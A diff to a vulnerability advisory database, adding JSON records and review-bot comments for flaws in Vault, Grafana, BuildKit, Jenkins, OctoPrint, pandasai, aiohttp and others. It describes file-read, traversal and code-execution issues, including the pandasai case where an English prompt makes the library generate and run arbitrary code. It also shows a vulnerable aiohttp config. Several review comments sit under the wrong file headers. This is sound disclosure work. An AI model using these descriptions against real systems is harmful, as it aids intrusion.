+ }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-4mp7-2m29-gqxf/GHSA-4mp7-2m29-gqxf.json b/advisories/github-reviewed/2024/01/GHSA-4mp7-2m29-gqxf/GHSA-4mp7-2m29-gqxf.json new file mode 100644 index 0000000000000..6a3eb6080ccea --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4mp7-2m29-gqxf/GHSA-4mp7-2m29-gqxf.json 
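Review bot: The upgrade guidance in `details` lists `==0.21.1, ==0.23.1, ==0.24.1, ==0.25.1, >=0.26.1` and omits 0.22.1, while the affected data adds entries for both `evm` and `evm-core` with `introduced` 0.22.0 and `fixed` 0.22.1, i.e. it asserts that 0.22.1 carries the fix. One of the two is stale: if 0.22.1 is patched, the sentence should read `==0.21.1, ==0.22.1, ==0.23.1, ==0.24.1, ==0.25.1, >=0.26.1`; otherwise the two 0.22.x entries should use `last_affected` rather than `fixed`. The remaining ranges match the versions the details name.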
@@ -0,0 +1,122 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mp7-2m29-gqxf", + "modified": "2024-01-31T00:21:58Z", + "published": "2024-01-31T00:21:58Z", + "aliases": [ + "CVE-2020-16251" + ], + "summary": "HashiCorp Vault Authentication bypass", + "details": "HashiCorp Vault and Vault Enterprise versions 0.8.3 and newer, when configured with the GCP GCE auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.3" + }, + { + "fixed": "1.2.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.3.0" + }, + { + "fixed": "1.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.0" + }, + { + "fixed": "1.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-16251" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#151" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/vault/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/159479/Hashicorp-Vault-GCP-IAM-Integration-Authentication-Bypass.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + 
"github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:21:58Z", + "nvd_published_at": "2020-08-26T15:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4pwp-cx67-5cpx/GHSA-4pwp-cx67-5cpx.json b/advisories/github-reviewed/2024/01/GHSA-4pwp-cx67-5cpx/GHSA-4pwp-cx67-5cpx.json new file mode 100644 index 0000000000000..59afafb3e1557 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4pwp-cx67-5cpx/GHSA-4pwp-cx67-5cpx.json 
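Review bot: The affected module is `github.com/hashicorp/vault/vault` while the details scope the bypass to the GCP GCE auth method; if the vulnerable logic lives in the separately published auth-plugin module rather than the core package, Go consumers importing only that plugin would not be matched. Worth confirming against the linked 1.5.1 changelog entry which module path carried the fix and, if it was the plugin, adding a second `affected` entry for it. The four ranges (0.8.3→1.2.5, 1.3.0→1.3.8, 1.4.0→1.4.4, 1.5.0→1.5.1) do agree with the fixed versions stated in the details.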
@@ -0,0 +1,71 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pwp-cx67-5cpx", + "modified": "2024-01-31T23:11:17Z", + "published": "2024-01-31T23:11:17Z", + "aliases": [ + "CVE-2019-19499" + ], + "summary": "Grafana Arbitrary File Read", + "details": "Grafana <= 6.4.3 has an Arbitrary File Read vulnerability, which could be exploited by an authenticated attacker that has privileges to modify the data source configurations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana/pkg/tsdb/mysql" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.4.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19499" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/20192" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#644-2019-11-06" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200918-0003/" + }, + { + "type": "WEB", + "url": "https://swarm.ptsecurity.com/grafana-6-4-3-arbitrary-file-read/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-22", + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:11:17Z", + "nvd_published_at": "2020-08-28T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json b/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json index 721ca7ee68de0..e7670bc4c520e 100644 --- a/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json +++ b/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json 
@@ -62,6 +62,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-23" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2024/01/GHSA-4v98-7qmw-rqr8/GHSA-4v98-7qmw-rqr8.json b/advisories/github-reviewed/2024/01/GHSA-4v98-7qmw-rqr8/GHSA-4v98-7qmw-rqr8.json new file mode 100644 index 0000000000000..53c15155248d2 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4v98-7qmw-rqr8/GHSA-4v98-7qmw-rqr8.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v98-7qmw-rqr8", + "modified": "2024-02-01T17:48:26Z", + "published": "2024-01-31T22:43:26Z", + "aliases": [ + "CVE-2024-23652" + ], + "summary": "BuildKit vulnerable to possible host system access from mount stub cleaner", + "details": "### Impact\nA malicious BuildKit frontend or Dockerfile using `RUN --mount` could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing `RUN --mount` feature.\n\n### References\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/buildkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.12.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23652" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/4603" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/buildkit" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:26Z", + "nvd_published_at": "2024-01-31T22:15:54Z" + } +} \ No newline at end of file 
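Review bot: The `details` text ends with an empty `### References` heading followed only by newlines, so the rendered advisory shows a section with no content. Either drop the heading or populate it with the fix PR and release that the `references` array already carries (`https://github.com/moby/buildkit/pull/4603` and `https://github.com/moby/buildkit/releases/tag/v0.12.5`).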
diff --git a/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json b/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json index 2fe07615d8ba6..22e5cbae0d5da 100644 --- a/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json +++ b/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-53ph-2r2x-vqw8", - "modified": "2024-01-26T01:57:04Z", + "modified": "2024-01-31T20:22:29Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23898" @@ -9,7 +9,10 @@ "summary": "Cross-site WebSocket hijacking vulnerability in the Jenkins CLI", "details": "\n\nJenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment. Since Jenkins 2.217 and LTS 2.222.1, one of the ways to communicate with the CLI is through a WebSocket endpoint. This endpoint relies on the default Jenkins web request authentication functionality, like HTTP Basic authentication with API tokens, or session cookies. This endpoint is enabled when running on a version of Jetty for which Jenkins supports WebSockets. This is the case when using the provided native installers, packages, or the Docker containers, as well as when running Jenkins with the command java -jar jenkins.war.\n\nJenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ { 
@@ -22,13 +25,47 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.222.1" + "introduced": "2.217" + }, + { + "fixed": "2.426.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.426.2" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.427" }, { - "fixed": "2.427" + "fixed": "2.442" } ] } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.440" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "versions": [ + "2.441" ] } ], @@ -48,7 +85,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-5626-pw9c-hmjr/GHSA-5626-pw9c-hmjr.json b/advisories/github-reviewed/2024/01/GHSA-5626-pw9c-hmjr/GHSA-5626-pw9c-hmjr.json new file mode 100644 index 0000000000000..95627220b57e5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-5626-pw9c-hmjr/GHSA-5626-pw9c-hmjr.json 
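Review bot: The second `org.jenkins-ci.main:jenkins-core` entry sets `last_known_affected_version_range` to `<= 2.440`, but the details state 2.217 through 2.441 inclusive are affected and the same hunk adds a third entry listing `2.441` in `versions`; since the range's `fixed` event 2.442 already covers 2.441, the three pieces disagree on the last affected weekly. If the separate 2.441 entry was added deliberately, the range annotation should read `"last_known_affected_version_range": "<= 2.441"`; otherwise the `versions` entry is redundant and can be folded into the range. The first entry's `<= 2.426.2` annotation does agree with its `fixed` 2.426.3 and with the details.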
@@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5626-pw9c-hmjr", + "modified": "2024-02-08T16:30:05Z", + "published": "2024-01-31T18:04:48Z", + "aliases": [ + "CVE-2024-23637" + ], + "summary": "OctoPrint Unverified Password Change via Access Control Settings", + "details": "### Impact\n\nOctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to change the password of other admin accounts, including their own, without having to repeat their password.\n\nAn attacker who managed to hijack an admin account might use this to lock out actual admins from their OctoPrint instance.\n\n### Patches\n\nThe vulnerability will be patched in version 1.10.0.\n\n### Workarounds\n\nOctoPrint administrators are strongly advised to thoroughly vet who has admin access to their installation.\n\n### Credits\n\nThis vulnerability was discovered and responsibly disclosed to OctoPrint by Timothy \"TK\" Ruppert.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "OctoPrint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.10.0rc1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.9.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-5626-pw9c-hmjr" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23637" + }, + { + "type": "WEB", + "url": "https://github.com/OctoPrint/OctoPrint/commit/1729d167b4ae4a5835bbc7211b92c6828b1c4125" + }, + { + "type": "PACKAGE", + "url": "https://github.com/OctoPrint/OctoPrint" + }, + { + "type": "WEB", + "url": "https://github.com/OctoPrint/OctoPrint/releases/tag/1.10.0rc1" + }, + { + "type": "WEB", + "url": 
"https://github.com/pypa/advisory-database/tree/main/vulns/octoprint/PYSEC-2024-29.yaml" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287", + "CWE-620" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T18:04:48Z", + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json b/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json index 094f2ba1582a4..526f743591bcc 100644 --- a/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json +++ b/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5g73-69p4-7gvx", - "modified": "2024-01-22T21:28:23Z", + "modified": "2024-01-29T21:53:03Z", "published": "2024-01-22T03:30:26Z", "aliases": [ "CVE-2024-23752" @@ -9,7 +9,10 @@ "summary": "Code execution in pandasai", "details": "GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -48,9 +51,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-862", "CWE-94" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-01-22T21:28:23Z", "nvd_published_at": "2024-01-22T01:15:08Z" 
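Review bot: The CVSS vector `AV:L/AC:L/PR:H/UI:N` in the OctoPrint advisory sits oddly with the details, which describe an admin changing other admins' passwords through the access-control settings of a web application and name a hijacked admin account as the threat; AV:N would normally be expected for a change made through the web UI. The vector presumably mirrors the upstream GHSA, so it is worth confirming against the maintainer's advisory rather than editing here. Separately, `"fixed": "1.10.0rc1"` points at a pre-release while the details say the patch will ship in 1.10.0; that is consistent under PEP 440 ordering, but readers comparing with the prose may expect `"fixed": "1.10.0"`.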
diff --git a/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json b/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json new file mode 100644 index 0000000000000..18187b7a44e99 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json 
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5h86-8mv2-jq9f", + "modified": "2024-01-30T16:12:20Z", + "published": "2024-01-29T22:31:03Z", + "aliases": [ + "CVE-2024-23334" + ], + "summary": "aiohttp is vulnerable to directory traversal", + "details": "### Summary\nImproperly configuring static resource resolution in aiohttp when used as a web server can result in the unauthorized reading of arbitrary files on the system.\n\n### Details\nWhen using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if a given file path is within the root directory.This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.\n\ni.e. An application is only vulnerable with setup code like:\n```\napp.router.add_routes([\n web.static(\"/static\", \"static/\", follow_symlinks=True), # Remove follow_symlinks to avoid the vulnerability\n])\n```\n\n### Impact\nThis is a directory traversal vulnerability with CWE ID 22. When using aiohttp as a web server and enabling static resource resolution with `follow_symlinks` set to True, it can lead to this vulnerability. This vulnerability has been present since the introduction of the `follow_symlinks` parameter.\n\n### Workaround\nEven if upgrading to a patched version of aiohttp, we recommend following these steps regardless.\n\nIf using `follow_symlinks=True` outside of a restricted local development environment, disable the option immediately. This option is NOT needed to follow symlinks which point to a location _within_ the static root directory, it is _only_ intended to allow a symlink to break out of the static directory. 
Even with this CVE fixed, there is still a substantial risk of misconfiguration when using this option on a server that accepts requests from remote users.\n\nAdditionally, aiohttp has always recommended using a reverse proxy server (such as nginx) to handle static resources and _not_ to use these static resources in aiohttp for production environments. Doing so also protects against this vulnerability, and is why we expect the number of affected users to be very low.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8079/files", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "aiohttp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.5" + }, + { + "fixed": "3.9.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23334" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8079" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8079/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/aio-libs/aiohttp" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2024-24.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:31:03Z", + "nvd_published_at": "2024-01-29T23:15:08Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2024/01/GHSA-67m4-qxp3-j6hh/GHSA-67m4-qxp3-j6hh.json b/advisories/github-reviewed/2024/01/GHSA-67m4-qxp3-j6hh/GHSA-67m4-qxp3-j6hh.json new file mode 100644 index 0000000000000..f620f61b35427 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-67m4-qxp3-j6hh/GHSA-67m4-qxp3-j6hh.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-67m4-qxp3-j6hh", + "modified": "2024-01-30T20:57:59Z", + "published": "2024-01-30T20:57:59Z", + "aliases": [ + "CVE-2024-23838" + ], + "summary": "TrueLayer.Client SSRF when fetching payment or payment provider", + "details": "### Impact\nThe vulnerability could potentially allow a malicious actor to gain control over the destination URL of the HttpClient used in the API classes. For applications using the SDK, requests to unexpected resources on local networks or to the internet could be made which could lead to information disclosure.\n\n### Patches\nVersions of TrueLayer.Client `v1.6.0` and later are not affected.\n\n### Workarounds\nThe issue can be mitigated by having strict egress rules limiting the destinations to which requests can be made, and applying strict validation to any user input passed to the TrueLayer.Client library.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "TrueLayer.Client" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/TrueLayer/truelayer-dotnet/security/advisories/GHSA-67m4-qxp3-j6hh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23838" + }, + { + "type": "WEB", + "url": "https://github.com/TrueLayer/truelayer-dotnet/commit/75e436ed5360faa73d6e7ce3a9903a3c49505e3e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TrueLayer/truelayer-dotnet" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:59Z", + "nvd_published_at": "2024-01-30T17:15:11Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json b/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json index f7f51654a976b..398e2f4ea1292 100644 --- a/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json +++ b/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6f9g-cxwr-q5jr", - "modified": "2024-01-26T01:56:43Z", + "modified": "2024-01-31T20:20:22Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23897" 
@@ -9,7 +9,10 @@ "summary": "Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE", "details": "\n\nJenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment.\n\nJenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.\n\nThis allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.\n\n* Attackers with Overall/Read permission can read entire files.\n\n* Attackers without Overall/Read permission can read the first few lines of files. The number of lines that can be read depends on available CLI commands. As of publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent releases of Jenkins without having any plugins installed, and has not identified any plugins that would increase this line count.\n\nBinary files containing cryptographic keys used for various Jenkins features can also be read, with some limitations (see note on binary files below). As of publication, the Jenkins security team has confirmed the following possible attacks in addition to reading contents of all files with a known file path. All of them leverage attackers' ability to obtain cryptographic keys from binary files, and are therefore only applicable to instances where that is feasible.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { 
@@ -22,13 +25,47 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.222.1" + "introduced": "1.606" }, { - "fixed": "2.427" + "fixed": "2.426.3" } ] } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.426.2" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.427" + }, + { + "fixed": "2.442" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.440" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "versions": [ + "2.441" ] } ], @@ -41,6 +78,14 @@ "type": "WEB", "url": "https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/24/6" diff --git a/advisories/github-reviewed/2024/01/GHSA-6fj5-m822-rqx8/GHSA-6fj5-m822-rqx8.json b/advisories/github-reviewed/2024/01/GHSA-6fj5-m822-rqx8/GHSA-6fj5-m822-rqx8.json new file mode 100644 index 0000000000000..cd501f073d791 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6fj5-m822-rqx8/GHSA-6fj5-m822-rqx8.json 
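Review bot: `"introduced": "1.606"` widens the affected range by several years compared with the previous value 2.222.1, but nothing in the hunk or in the details text (which only says "Jenkins 2.441 and earlier, LTS 2.426.2 and earlier") substantiates that release as the point where args4j's expandAtFiles became reachable through the CLI. If the value comes from the upstream Jenkins advisory, a reference entry pointing at that statement would make the range auditable; if it is an estimate, `"introduced": "0"` is the conventional way to express "all prior versions". The `database_specific` hint on the 2.427 range and the 2.441 versions entry added in this hunk have the same consistency issue raised on GHSA-53ph-2r2x-vqw8 in this commit.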
@@ -0,0 +1,105 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fj5-m822-rqx8", + "modified": "2024-01-31T23:16:46Z", + "published": "2024-01-31T23:16:46Z", + "aliases": [ + "CVE-2021-21285" + ], + "summary": "moby docker daemon crash during image pull of malicious image", + "details": "### Impact\n\nPulling an intentionally malformed Docker image manifest crashes the `dockerd` daemon.\n\n### Patches\n\nVersions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.\n\n### Credits\n\nMaintainers would like to thank Josh Larsen, Ian Coldwater, Duffie Cooley, Rory McCune for working on the vulnerability and Brad Geesaman for responsibly disclosing it to security@docker.com.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.3.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "20.10.0-beta1" + }, + { + "fixed": "20.10.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-6fj5-m822-rqx8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21285" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/8d3179546e79065adefa67cc697c09d0ab137d30" + }, + { + "type": "WEB", + "url": "https://docs.docker.com/engine/release-notes/#20103" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/releases/tag/v19.03.15" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/releases/tag/v20.10.3" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202107-23" + }, + { + "type": "WEB", + "url": 
"https://security.netapp.com/advisory/ntap-20210226-0005/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4865" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:16:46Z", + "nvd_published_at": "2021-02-02T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6g2q-w5j3-fwh4/GHSA-6g2q-w5j3-fwh4.json b/advisories/github-reviewed/2024/01/GHSA-6g2q-w5j3-fwh4/GHSA-6g2q-w5j3-fwh4.json new file mode 100644 index 0000000000000..0400b10d946c6 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6g2q-w5j3-fwh4/GHSA-6g2q-w5j3-fwh4.json 
